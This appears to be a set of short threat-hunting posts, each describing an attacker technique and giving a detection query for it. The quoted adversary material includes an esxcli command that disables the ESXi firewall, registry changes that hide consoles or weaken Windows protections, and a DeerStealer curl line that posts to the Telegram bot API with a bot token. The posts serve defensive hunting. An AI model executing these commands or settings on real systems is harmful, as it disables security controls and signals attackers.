Know Your Adversary

Hello everyone! If we're talking about ransomware gangs, we're always talking about  Command and Scripting Interpreter: Hypervisor CLI (T1059.012) . Yes, ransomware gangs love it! Let's look at RansomHouse , and focus on MrAgent. To obtain the MAC address, it runs the following command: esxcli --formatter=csv network nic list It runs the following command to collect information on the IP-address: esxcli --formatter=csv network nic list It also abuses ESXCLI to disable the firewall: esxcli network firewall set --enabled false So, for example, we can hunt for suspicious commands related to managing of host networking: event_type: "processcreatenix" AND cmdline: ("esxcli" AND "network") See you tomorrow!

Hello everyone! We often see how adversares make console windows hidden. But they can also just make them to appear off-screen! Let's look at an example! This time we'll look at Cloud Atlas (or Cloud Werewolf as we track it). The adversary modified the following registry keys to hide console windows: "HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe"::"WindowPosition"::5122 "HKCU\UConsole\taskeng.exe"::"WindowPosition"::538126692 Quite interesting, right? And we can look for suspicious registry modification events: event_type: "registryvaluesetwin" AND reg_key_path: "windowposition" See you tomorrow!

Hello everyone! Let's look at another interesting example of how adversaries abuse legitimate infrastructure for C2. This time it's Fastly. Kaspersky revealed  another  ForumTroll campaign. This time the adversary leveraged  Tuoni - a commercial red teaming framework. At the same time, the threat actors used the same service for C2 as in previous campaigns - Fastly. What does it mean? We can use it for our threat hunting missions! event_type: "dnsreqwin" AND dns_rname: "fastly.net" See you tomorrow!

Hello everyone! Today we'll look at a few more examples of how adversaries intentionally weaken Windows security posture to assist persistence and lateral movement. According to the report , Ink Dragon modified various Windows registry settings to downgrade security controls: enabled restricted admin ( DisableRestrictedAdmin ), disabled remote token filtering ( LocalAccountTokenFilterPolicy ), enabled the DSRM (Directory Services Restore Mode) Administrator account ( DsrmAdminLogonBehavior ), and removed Process Protection Level safeguards ( RunAsPPL ). These behaviors are definitely good target for hunting, for example: event_type: "registryvaluesetwin" AND reg_key_path: "localaccounttokenfilterpolicy" AND reg_value_data: "0x00000001" See you tomorrow!

Hello everyone! Let's look at another curious case of how adversaries abuse legitimate web services to solve various tasks. And this time we'll look at how they use Telegram for payload execution notification. Our example for today -  DeerStealer . As you can see the threat actors leveraged curl.exe to get a notification that the payload is executed: C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен"" Similar activity may be legitimate - administrators may use Telegram to get notifications if anything goes wrong, but still it's a good target for threat hunting: event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: *telegram* See you tomorrow!

Hello everyone! In some cases adversaries do not need a dedicated C2 infrastructure. They can use the following technique:  Web Service (T1102) . UNC5174 , for example, leveraged the Discord API as their C2 channel. This approach enabled the adversary to mimic legitimate traffic patterns and evade existing security policies. Unfortunately, Discord-related domains may be resolved by various legitimate software, but still it's a great target for hunting as it's not the first time threat actors abuse it: event_type: ("dnsreqwin" OR "dnsreqnix") AND dns_rname: ("discord.com" OR "discord.gg") AND NOT proc_file_path: *discord* See you tomorrow!